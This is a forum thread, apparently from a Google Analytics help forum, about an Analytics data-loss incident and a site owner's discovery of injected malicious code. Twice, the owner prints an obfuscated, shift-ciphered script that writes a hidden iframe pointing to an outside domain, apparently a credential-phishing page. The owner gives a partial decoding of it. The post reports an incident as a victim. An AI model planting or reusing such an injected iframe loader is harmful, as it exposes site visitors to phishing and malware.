"...regarding the issue of visits and e-commerce hits being dropped in Analytics, the official explanation that I got from our Analytics team is that Google Analytics experienced a data processing error from April 30th to May 5th. Almost all of the data has been recovered and is currently being reprocessed."
Google would only tell me that they see a malicous code on our site, one that I had trouble identifying.
Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.
Here is the original code:
="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";
And here is what I translated it to:
script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – [leohin.com.diamond.i.index...] - document - write – str – substring – 68-226 – str – substring – 1-68 – script
Heres where it gets interesting.
If you were to go to leohin.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a users login information and then capture that information before sending the person through to the Google Analytics site.
I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.
It is ironic that Google flagged our account as providing malicous code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I recieved notification of data loss on the analytics side during the same time this other issue was going on.
I've asked Google if there has been a security breach and will update this thread once I receive a response.
back on topic: my rep has explained that the data restoration will be commencing tonight (I don't see anything yet) or tomorrow.The bad news: if it doesn't occur by Friday 5/16 then I'm out of luck and the data is not retrievable.
Hi exposure & all,
My sincerest apologies for taking so long to get here; as you can imagine, it's been quite a week for us here in Analytics!
exposure, we are still in the process of restoring data, and expect it to be completed by EOD tomorrow, 5/16. I will, of course, keep this thread updated as I receive more updates.
GAA
I'm not sure if this is related but recently my website was labled as as hosting badware. I have always ran a clean site and have advertised using the Google Adwords program for several years.Google would only tell me that they see a malicous code on our site, one that I had trouble identifying.
Then yesterday morning I found a code which I thought looked suspect. It was written in a cypher and originally I thought it was just part of the programming behind the site. After looking at the string of code in more detail I realized that it was a cypher, in fact an easy one in which to decode.
Here is the original code:
="=tdsjqu?!wbs!Tus>#33(!xjeui>2!ifjhiu>2!tuzmf>(wjtjcjmjuz;!ijeefo(?=0jg
sbnf?=jgsbnf!tsd>(iuuq;00mfpijo/dpn0ejbnpoe0j0joefy/qiq@pvu>33#..epdvnfo
u/xsjuf)Tus/tvctusjoh)68-226*-Tus/tvctusjoh)1-68**!=0tdsjqu?";And here is what I translated it to:
script – var – str – width – height – style – visibility – hidden – I – frame – I – frame – iframe – src – [leohin.com.diamond.i.index...] - document - write – str – substring – 68-226 – str – substring – 1-68 – script
Heres where it gets interesting.
If you were to go to leohin.com you would see that it was a spoofed Google Analytics site. Google as of last night has been working at getting that site taken down however from what I can discern it has been up for about three months. I have a screen shot of the spoofed Analytics site. It appears it would ask for a users login information and then capture that information before sending the person through to the Google Analytics site.
I don't know if these issues are resolved however they very well may be. It is also possible that other Google Analytics accounts have been breached like ours may have been.
It is ironic that Google flagged our account as providing malicous code and would not assist us other than verify that the code was still on the site and then it turns out that the code led back to a spoofed Google Analytics site. I've yet to hear much back regarding this but it seems interesting that I recieved notification of data loss on the analytics side during the same time this other issue was going on.
I've asked Google if there has been a security breach and will update this thread once I receive a response.
Hi mcmunsta,
I recall your email; it was escalated to me and my team earlier this week.
Our teams are still evaluating the scope of the breach, but there seems to be a lot at work here. From experience, I strongly recommend looking into a forensic analysis to find the breach on your machine.
Feel free to PM me with questions, and I'd be happy to chat outside the context of this thread :)
GAA